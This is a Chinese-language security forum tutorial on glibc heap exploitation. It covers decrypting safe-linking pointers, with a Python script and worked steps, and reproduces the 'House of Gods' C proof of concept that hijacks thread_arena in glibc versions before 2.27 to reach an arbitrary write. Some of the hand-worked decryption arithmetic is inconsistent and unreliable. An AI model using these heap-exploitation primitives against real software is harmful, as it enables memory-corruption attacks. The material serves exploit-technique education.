bypass safe-linking机制需要用到uaf或者double free之类的漏洞, 同时释放tcache到一个空闲tacahe bin中, 此时由于tcache bin中没有空闲chunk,tcache->entry[tc_idx]=0,若存在uaf或者double free,可以泄露出leak_addr= (&tcache_chunk->fd)>>12位置, 则heap_base=leak_addr<<12double free需要将tcache_chunk_bk改为0,绕过检查。对于2.32及以后的glibc版本的tcache_poisoning需要将target地址进行加密。

调试


申请a,b两个tcache_chunk,最后一个chunk_0x10用于隔离,下面解析b_fd

◆解密脚本:

def decrypt(cipher):
key=0
plain=0
for i in range(1,6):
bits= 64-12*(i)
if(bits<0):
bits=0
plain = ((cipher ^ key) >> bits) << bits
key = plain >> 12
print("round %d:\n"%(i))
print("key: %#016lx\n"%key)
print("plain: %#016lx\n"%plain)
print("cipher: %#016lx\n\n"%cipher)

◆原理:

前置:

P:0x0000_555_555_55b_2a0; L:0x0000_555_555_55b_2d0; L>>12:0x0000_000_555_555_55b; p':0x0000_555_000_00e_7fb

(0x55555555b2d0 >> 12) = 0x55555555B; 0x55555555b2a0 ^ 0x55555555B = 0x55500000E7FB;

步骤:

P ^ (L >> 12);。此时L12位为0,而P12位为0x555,异或时将保留0x0000_555,而异或操作又是可逆的,所以用保留的0x0000_555_000_000_000和 低位0x0000_000_555_000_000取异或即可得到低三位的真实地址,以此类推有了以下步骤。

1.

bits = 52;

key = 0;

plain = ((0x0000_555_000_00e_7fb ^ 0) >> 52) << 52 = 0x000_000_000_000_0000;

key = plain >> 12 = 0;

2.

bits = 40;

key = 0;

plain = ((0x0000_555_000_00e_7fb ^ 0) >> 40) << 40 = 0x000_055_000_000_0000;

key = plain >> 12 = 0x000_000_055_000_000_0

3.

bits = 28;

key = 0x000_000_055_000_000_0;

plain = ((0x000_055_500_000_e7fb ^ 0x000_000_055_000_000_0) >> 28) << 28 = 0x000_055_555_000_0000

key = plain >> 12 = 0x000_000_055_555_0000;

4.

bits = 16;

key = 0x000_000_055_555_0000;

plain = ((0x000_055_500_000_e7fb ^ 0x000_000_055_555_0000) >> 28) << 28 = 0x000_055_555_555_0000

key = plain >> 12 = 0x000_000_055_555_5550;

5.

bits = 4;

key = 0x000_000_055_555_5550;

plain = ((0x000_055_500_000_e7fb ^ 0x000_000_055_555_5550) >> 28) << 28 = 0x000_055_555_555_b2a0

key = plain >> 12 = 0x000_055_555_555_b;

glibc < 2.27,这是一个比较有趣的利用手法。

源码

/* House of Gods PoC */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <inttypes.h>

/*
* Welcome to the House of Gods...
*
* House of Gods is an arena hijacking technique for glibc < 2.27. It supplies
* the attacker with an arbitrary write against the thread_arena symbol of
* the main thread. This can be used to replace the main_arena with a
* carefully crafted fake arena. The exploit was tested against
*
* - glibc-2.23
* - glibc-2.24
* - glibc-2.25
* - glibc-2.26
*
* Following requirements are mandatory
*
* - 8 allocs of arbitrary size to hijack the arena (+2 for ACE)
* - control over first 5 quadwords of a chunk's userdata
* - a single write-after-free bug on an unsorted chunk
* - heap address leak + libc address leak
*
* This PoC demonstrates how to leverage the House of Gods in order to hijack
* the thread_arena. But it wont explain how to escalate further to
* arbitrary code execution, since this step is trivial once the whole arena
* is under control.
*
* Also note, that the how2heap PoC might use more allocations than
* previously stated. This is intentional and has educational purposes.
*
* If you want to read the full technical description of this technique, going
* from zero to arbitrary code execution within only 10 to 11 allocations, here
* is the original document I've written
*
* https://github.com/Milo-D/house-of-gods/blob/master/rev2/HOUSE_OF_GODS.TXT
*
* I recommend reading this document while experimenting with
* the how2heap PoC.
*
* Besides that, this technique abuses a minor bug in glibc, which I have
* already submitted to bugzilla at
*
* https://sourceware.org/bugzilla/show_bug.cgi?id=29709
*
* AUTHOR: David Milosevic (milo)
*
* */

/* <--- Exploit PoC ---> */

int main(void) {

printf("=================\n");
printf("= House of Gods =\n");
printf("=================\n\n");

printf("=== Abstract ===\n\n");

printf("The core of this technique is to allocate a fakechunk overlapping\n");
printf("the binmap field within the main_arena. This fakechunk is located at\n");
printf("offset 0x850. Its sizefield can be crafted by carefully binning chunks\n");
printf("into smallbins or largebins. The binmap-chunk is then being linked into\n");
printf("the unsorted bin via a write-after-free bug in order to allocate it back\n");
printf("as an exact fit. One can now tamper with the main_arena.next pointer at\n");
printf("offset 0x868 and inject the address of a fake arena. A final unsorted bin\n");
printf("attack corrupts the narenas variable with a very large value. From there, only\n");
printf("two more allocation requests for at least 0xffffffffffffffc0 bytes of memory\n");
printf("are needed to trigger two consecutive calls to the reused_arena() function,\n");
printf("which in turn traverses the corrupted arena-list and sets thread_arena to the\n");
printf("address stored in main_arena.next - the address of the fake arena.\n\n");

printf("=== PoC ===\n\n");

printf("Okay, so let us start by allocating some chunks...\n\n");

/*
* allocate a smallchunk, for example a 0x90-chunk.
* */
void *SMALLCHUNK = malloc(0x88);

/*
* allocate the first fastchunk. We will use
* a 0x20-chunk for this purpose.
* */
void *FAST20 = malloc(0x18);

/*
* allocate a second fastchunk. This time
* a 0x40-chunk.
* */
void *FAST40 = malloc(0x38);

printf("%p is our 0x90-sized smallchunk. We will bin this chunk to forge a\n", SMALLCHUNK);
printf("fake sizefield for our binmap-chunk.\n\n");

printf("%p is our first fastchunk. Its size is 0x20.\n\n", FAST20);

printf("%p is our second fastchunk with a size of 0x40. The usecase of\n", FAST40);
printf("both fastchunks will be explained later in this PoC.\n\n");

printf("We can move our smallchunk to the unsorted bin by simply free'ing it...\n\n");

/*
* put SMALLCHUNK into the unsorted bin.
* */
free(SMALLCHUNK);

/*
* this is a great opportunity to simulate a
* libc leak. We just read the address of the
* unsorted bin and save it for later.
* */
const uint64_t leak = *((uint64_t*) SMALLCHUNK);

printf("And now we need to make a request for a chunk which can not be serviced by\n");
printf("our recently free'd smallchunk. Thus, we will make a request for a\n");
printf("0xa0-sized chunk - let us call this chunk INTM (intermediate).\n\n");

/*
* following allocation will trigger a binning
* process within the unsorted bin and move
* SMALLCHUNK to the 0x90-smallbin.
* */
void *INTM = malloc(0x98);

printf("Our smallchunk should be now in the 0x90-smallbin. This process also triggered\n");
printf("the mark_bin(m, i) macro within the malloc source code. If you inspect the\n");
printf("main_arena's binmap located at offset 0x855, you will notice that the initial\n");
printf("value of the binmap changed from 0x0 to 0x200 - which can be used as a valid\n");
printf("sizefield to bypass the unsorted bin checks.\n\n");

printf("We would also need a valid bk pointer in order to bypass the partial unlinking\n");
printf("procedure within the unsorted bin. But luckily, the main_arena.next pointer at\n");
printf("offset 0x868 points initially to the start of the main_arena itself. This fact\n");
printf("makes it possible to pass the partial unlinking without segfaulting.\n\n");

printf("So now that we have crafted our binmap-chunk, it is time to allocate it\n");
printf("from the unsorted bin. For that, we will abuse a write-after-free bug\n");
printf("on an unsorted chunk. Let us start...\n\n");

printf("First, allocate another smallchunk...\n");

/*
* recycle our previously binned smallchunk.
* Note that, it is not neccessary to recycle this
* chunk. I am doing it only to keep the heap layout
* small and compact.
* */
SMALLCHUNK = malloc(0x88);

printf("...and now move our new chunk to the unsorted bin...\n");

/*
* put SMALLCHUNK into the unsorted bin.
* */
free(SMALLCHUNK);

printf("...in order to tamper with the free'd chunk's bk pointer.\n\n");

/*
* bug: a single write-after-free bug on an
* unsorted chunk is enough to initiate the
* House of Gods technique.
* */
*((uint64_t*) (SMALLCHUNK + 0x8)) = leak + 0x7f8;

printf("Great. We have redirected the unsorted bin to our binmap-chunk.\n");
printf("But we also have corrupted the bin. Let's fix this, by redirecting\n");
printf("a second time.\n\n");

printf("The next chunk (head->bk->bk->bk) in the unsorted bin is located at the start\n");
printf("of the main-arena. We will abuse this fact and free a 0x20-chunk and a 0x40-chunk\n");
printf("in order to forge a valid sizefield and bk pointer. We will also let the 0x40-chunk\n");
printf("point to another allocated chunk (INTM) by writing to its bk pointer before\n");
printf("actually free'ing it.\n\n");

/*
* before free'ing those chunks, let us write
* the address of another chunk to the currently
* unused bk pointer of FAST40. We can reuse
* the previously requested INTM chunk for that.
*
* Free'ing FAST40 wont reset the bk pointer, thus
* we can let it point to an allocated chunk while
* having it stored in one of the fastbins.
*
* The reason behind this, is the simple fact that
* we will need to perform an unsorted bin attack later.
* And we can not request a 0x40-chunk to trigger the
* partial unlinking, since a 0x40 request will be serviced
* from the fastbins instead of the unsorted bin.
* */
*((uint64_t*) (FAST40 + 0x8)) = (uint64_t) (INTM - 0x10);

/*
* and now free the 0x20-chunk in order to forge a sizefield.
* */
free(FAST20);

/*
* and the 0x40-chunk in order to forge a bk pointer.
* */
free(FAST40);

printf("Okay. The unsorted bin should now look like this\n\n");

printf("head -> SMALLCHUNK -> binmap -> main-arena -> FAST40 -> INTM\n");
printf(" bk bk bk bk bk\n\n");

printf("The binmap attack is nearly done. The only thing left to do, is\n");
printf("to make a request for a size that matches the binmap-chunk's sizefield.\n\n");

/*
* all the hard work finally pays off...we can
* now allocate the binmap-chunk from the unsorted bin.
* */
void *BINMAP = malloc(0x1f8);

printf("After allocating the binmap-chunk, the unsorted bin should look similar to this\n\n");

printf("head -> main-arena -> FAST40 -> INTM\n");
printf(" bk bk bk\n\n");

printf("And that is a binmap attack. We've successfully gained control over a small\n");
printf("number of fields within the main-arena. Two of them are crucial for\n");
printf("the House of Gods technique\n\n");

printf(" -> main_arena.next\n");
printf(" -> main_arena.system_mem\n\n");

printf("By tampering with the main_arena.next field, we can manipulate the arena's\n");
printf("linked list and insert the address of a fake arena. Once this is done,\n");
printf("we can trigger two calls to malloc's reused_arena() function.\n\n");

printf("The purpose of the reused_arena() function is to return a non-corrupted,\n");
printf("non-locked arena from the arena linked list in case that the current\n");
printf("arena could not handle previous allocation request.\n\n");

printf("The first call to reused_arena() will traverse the linked list and return\n");
printf("a pointer to the current main-arena.\n\n");

printf("The second call to reused_arena() will traverse the linked list and return\n");
printf("a pointer to the previously injected fake arena (main_arena.next).\n\n");

printf("We can reach the reused_arena() if we meet following conditions\n\n");

printf(" - exceeding the total amount of arenas a process can have.\n");
printf(" malloc keeps track by using the narenas variable as\n");
printf(" an arena counter. If this counter exceeds the limit (narenas_limit),\n");
printf(" it will start to reuse existing arenas from the arena list instead\n");
printf(" of creating new ones. Luckily, we can set narenas to a very large\n");
printf(" value by performing an unsorted bin attack against it.\n\n");

printf(" - force the malloc algorithm to ditch the current arena.\n");
printf(" When malloc notices a failure it will start a second allocation\n");
printf(" attempt with a different arena. We can mimic an allocation failure by\n");
printf(" simply requesting too much memory i.e. 0xffffffffffffffc0 and greater.\n\n");

printf("Let us start with the unsorted bin attack. We load the address of narenas\n");
printf("minus 0x10 into the bk pointer of the currently allocated INTM chunk...\n\n");

/*
* set INTM's bk to narenas-0x10. This will
* be our target for the unsorted bin attack.
* */
*((uint64_t*) (INTM + 0x8)) = leak - 0xa40;

printf("...and then manipulate the main_arena.system_mem field in order to pass the\n");
printf("size sanity checks for the chunk overlapping the main-arena.\n\n");

/*
* this way we can abuse a heap pointer
* as a valid sizefield.
* */
*((uint64_t*) (BINMAP + 0x20)) = 0xffffffffffffffff;

printf("The unsorted bin should now look like this\n\n");

printf("head -> main-arena -> FAST40 -> INTM -> narenas-0x10\n");
printf(" bk bk bk bk\n\n");

printf("We can now trigger the unsorted bin attack by requesting the\n");
printf("INTM chunk as an exact fit.\n\n");

/*
* request the INTM chunk from the unsorted bin
* in order to trigger a partial unlinking between
* head and narenas-0x10.
* */
INTM = malloc(0x98);

printf("Perfect. narenas is now set to the address of the unsorted bin's head\n");
printf("which should be large enough to exceed the existing arena limit.\n\n");

printf("Let's proceed with the manipulation of the main_arena.next pointer\n");
printf("within our previously allocated binmap-chunk. The address we write\n");
printf("to this field will become the future value of thread_arena.\n\n");

/*
* set main_arena.next to an arbitrary address. The
* next two calls to malloc will overwrite thread_arena
* with the same address. I'll reuse INTM as fake arena.
*
* Note, that INTM is not suitable as fake arena but
* nevertheless, it is an easy way to demonstrate that
* we are able to set thread_arena to an arbitrary address.
* */
*((uint64_t*) (BINMAP + 0x8)) = (uint64_t) (INTM - 0x10);

printf("Done. Now all what's left to do is to trigger two calls to the reused_arena()\n");
printf("function by making two requests for an invalid chunksize.\n\n");

/*
* the first call will force the reused_arena()
* function to set thread_arena to the address of
* the current main-arena.
* */
malloc(0xffffffffffffffbf + 1);

/*
* the second call will force the reused_arena()
* function to set thread_arena to the address stored
* in main_arena.next - our fake arena.
* */
malloc(0xffffffffffffffbf + 1);

printf("We did it. We hijacked the thread_arena symbol and from now on memory\n");
printf("requests will be serviced by our fake arena. Let's check this out\n");
printf("by allocating a fakechunk on the stack from one of the fastbins\n");
printf("of our new fake arena.\n\n");

/*
* construct a 0x70-fakechunk on the stack...
* */
uint64_t fakechunk[4] = {

0x0000000000000000, 0x0000000000000073,
0x4141414141414141, 0x0000000000000000
};

/*
* ...and place it in the 0x70-fastbin of our fake arena
* */
*((uint64_t*) (INTM + 0x20)) = (uint64_t) (fakechunk);

printf("Fakechunk in position at stack address %p\n", fakechunk);
printf("Target data within the fakechunk at address %p\n", &fakechunk[2]);
printf("Its current value is %#lx\n\n", fakechunk[2]);

printf("And after requesting a 0x70-chunk...\n");

/*
* use the fake arena to perform arbitrary allocations
* */
void *FAKECHUNK = malloc(0x68);

printf("...malloc returns us the fakechunk at %p\n\n", FAKECHUNK);

printf("Overwriting the newly allocated chunk changes the target\n");
printf("data as well: ");

/*
* overwriting the target data
* */
*((uint64_t*) (FAKECHUNK)) = 0x4242424242424242;

printf("%#lx\n", fakechunk[2]);

/*
* confirm success
* */
assert(fakechunk[2] == 0x4242424242424242);

return EXIT_SUCCESS;
}

前置知识

先了解一下binmap的用处。

struct malloc_state
{
[...]

/* Bitmap of bins */
unsigned int binmap[BINMAPSIZE];

/* Linked list */
struct malloc_state *next;

/* Linked list for free arenas. Access to this field is serialized
by free_list_lock in arena.c. */
struct malloc_state *next_free;

/* Number of threads attached to this arena. 0 if the arena is on
the free list. Access to this field is serialized by
free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;

/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};

binmapmalloc过程中的下面两个场景会被修改:

1.在遍历unsorted bin中的空闲chunk时如果将该chunk放入对应的small binlarge bin中会在binmap对应位置置位。

mark_bin(av, victim_index);
#define mark_bin(m, i) ((m)->binmap[idx2block(i)] |= idx2bit(i))

2.在遍历small bin + large bin找大小不小于当前chunk的空闲chunk时如果对应binmap置位的bin是空闲的就将对应位置复位。

av->binmap[block] = map &= ~bit;

调试

首先申请依次申请SMALLCHUNK_0x90, FASTCHUNK_0x20, FASTCHUNK_0x40,然后将SMALLCHUNK_0x90释放到unsorted bin中。

然后申请SMALLCHUNK_0xa0(INTM),这时候会触发第二个改变binmap的条件,会将binmap[0]改为0x200,我们将其作为fake_chunk_size,暂且叫包含binmapfake_chunkBINMAP。并将SMALLCHUNK_0x90放进small_bin_0x90的位置上。

然后重新申请SMALLCHUNK_0x90,再将其释放到unsorted_bin中。利用UAF漏洞将其SMALLCHUNK_0x90.bk->&main_arena.bins[253],也就是fake_chunk_prevsize。再将FASTCHUNK_0x40.bk->(SMALLCHUNK_0xa0)INTM,然后释放FASTBIN_0x20, FASTBIN_0x40。其中FASTBIN_0x20正好位于main_arena_size的位置,其作用是确保main_arena所在的fake chunksize大于2 * SIZE_SZ此时unsorted bin结构如下。

(因为binmap数组是uint类型是4字节大小,所以fake_chunk_binmap.bk == nextnext指针指向&main_arena)

head.bk -> SMALLCHUNK_0x90.bk -> BINMAP.bk -> main-arena.bk -> FASTCHUNK_0x40.bk -> INTM

此时申请0x1f8大小的chunk将会把正好合适的BINMAP申请出来。之后我们考虑通过如何把arena切换到 伪造的arena上。在__libc_malloc上,我们通过arena_get来获取arena。由于arenaflags的值一般为0,因此将宏展开后发现实际上是获取的thread_arena的值。

#define arena_get(ptr, size) \
do { \
ptr = thread_arena; \
arena_lock(ptr, size); \
} while (0)

arena_get获取arena后会调用_int_malloc尝试申请内存,如果_int_malloc返回NULL则调用arena_get_retry_int_malloc尝试再次分配内存。

arena_get(ar_ptr, bytes);

victim = _int_malloc(ar_ptr, bytes);
/* Retry with another arena only if we were able to find a usable arena
before. */
if (!victim && ar_ptr != NULL) {
LIBC_PROBE(memory_malloc_retry, 1, bytes);
ar_ptr = arena_get_retry(ar_ptr, bytes);
victim = _int_malloc(ar_ptr, bytes);
}

由于arenamain_arena,因此实际上调用的是arena_get2

static mstate
arena_get_retry(mstate ar_ptr, size_t bytes) {
LIBC_PROBE(memory_arena_retry, 2, bytes, ar_ptr);
if (ar_ptr != &main_arena) {
...
} else {
(void) mutex_unlock(&ar_ptr->mutex);
ar_ptr = arena_get2(bytes, ar_ptr);
}

return ar_ptr;
}

arena_get2函数中,如果n <= narenas_limit - 1则调用_int_new_arena创建一个新的arena。否则调用reused_arena从现有的arena中找一个可用的arena

static mstate internal_function arena_get2(size_t size, mstate avoid_arena) {
mstate a;

static size_t narenas_limit;

a = get_free_list(); // 调试发现返回 NULL
if (a == NULL) {
/* Nothing immediately available, so generate a new arena. */
if (narenas_limit == 0) {
if (mp_.arena_max != 0)
narenas_limit = mp_.arena_max;
else if (narenas > mp_.arena_test) {
int n = __get_nprocs();

if (n >= 1)
narenas_limit = NARENAS_FROM_NCORES(n);
else
/* We have no information about the system. Assume two
cores. */
narenas_limit = NARENAS_FROM_NCORES(2);
}
}
repeat:;
size_t n = narenas;
/* NB: the following depends on the fact that (size_t)0 - 1 is a
very large number and that the underflow is OK. If arena_max
is set the value of arena_test is irrelevant. If arena_test
is set but narenas is not yet larger or equal to arena_test
narenas_limit is 0. There is no possibility for narenas to
be too big for the test to always fail since there is not
enough address space to create that many arenas. */
if (__glibc_unlikely(n <= narenas_limit - 1)) {
if (catomic_compare_and_exchange_bool_acq(&narenas, n + 1, n))
goto repeat;
a = _int_new_arena(size);
if (__glibc_unlikely(a == NULL))
catomic_decrement(&narenas);
} else
a = reused_arena(avoid_arena);
}
return a;
}

reused_arenanext_to_use开始沿arena.next链表找第一个满足!arena_is_corrupt(result) && !mutex_trylock(&result->mutex)arena,并且会将找到的arena赋值给thread_arena,然后更新next_to_use为下一个arena

static size_t narenas = 1;
static mstate
reused_arena(mstate avoid_arena) {
mstate result;
/* FIXME: Access to next_to_use suffers from data races. */
static mstate next_to_use;
if (next_to_use == NULL)
next_to_use = &main_arena;

/* Iterate over all arenas (including those linked from
free_list). */
result = next_to_use;
do {
if (!arena_is_corrupt(result) && !mutex_trylock(&result->mutex))
goto out;

/* FIXME: This is a data race, see _int_new_arena. */
result = result->next;
} while (result != next_to_use);

...
out:
...
thread_arena = result;
next_to_use = result->next;

return result;
}

因此我们可以修改main_arena.next指向伪造的arena然后两次调用malloc(0xffffffffffffffbf + 1),(第一次调用result==&main_arena;next_to_use==INTM); 通过checked_request2size(bytes, nb);宏使得_int_malloc返回NULL,最终使得thread_arena指向我们伪造的arena

首先需要确保narenas > narenas_limit - 1从而调用reused_arena,因此要构造unsorted bin attacknarenas改成一个较大的数。为了确保从unsorted bin中取出的chunk能通过victim->size > av->system_mem检查,我们将main_arena.system_mem赋值为0xffffffffffffffff。将INTM.bk指向&narenas - 0x10构造unsorted bin attack

申请0xa0大小的chunk(申请被构造在unsorted binINTM)触发unsorted bin attack。此时arenas上被写入了&main_arena.top

main_arena.next指向INTM,连续两次malloc(0xffffffffffffffbf + 1);thread_arena指向我们伪造的INTM

伪造如下fast_chunk

之后将(uint64_t) (INTM_prev+0x30)指向伪造的chunk

此时如果malloc(0x68)就会将目标地址处的内存申请出来。

看雪ID:jelasin

https://bbs.kanxue.com/user-home-958172.htm

*本文为看雪论坛精华文章,由 jelasin 原创,转载请注明来自看雪社区

# 往期推荐

1、2023 SDC 议题回顾 | 芯片安全和无线电安全底层渗透技术

2、SWPUCTF 2021 新生赛-老鼠走迷宫

3、OWASP 实战分析 level 1

4、【远控木马】银狐组织最新木马样本-分析

5、自研Unidbg trace工具实战ollvm反混淆

6、2023 SDC 议题回顾 | 深入 Android 可信应用漏洞挖掘

球分享

球点赞

球在看


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458534173&idx=1&sn=3b88feb669498b9b7f6fadd5784d8435&chksm=b06026a211c058bb0105403c1a5f603154ee296b2a94b627df5e183ce29a88b63f9751fe525a&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh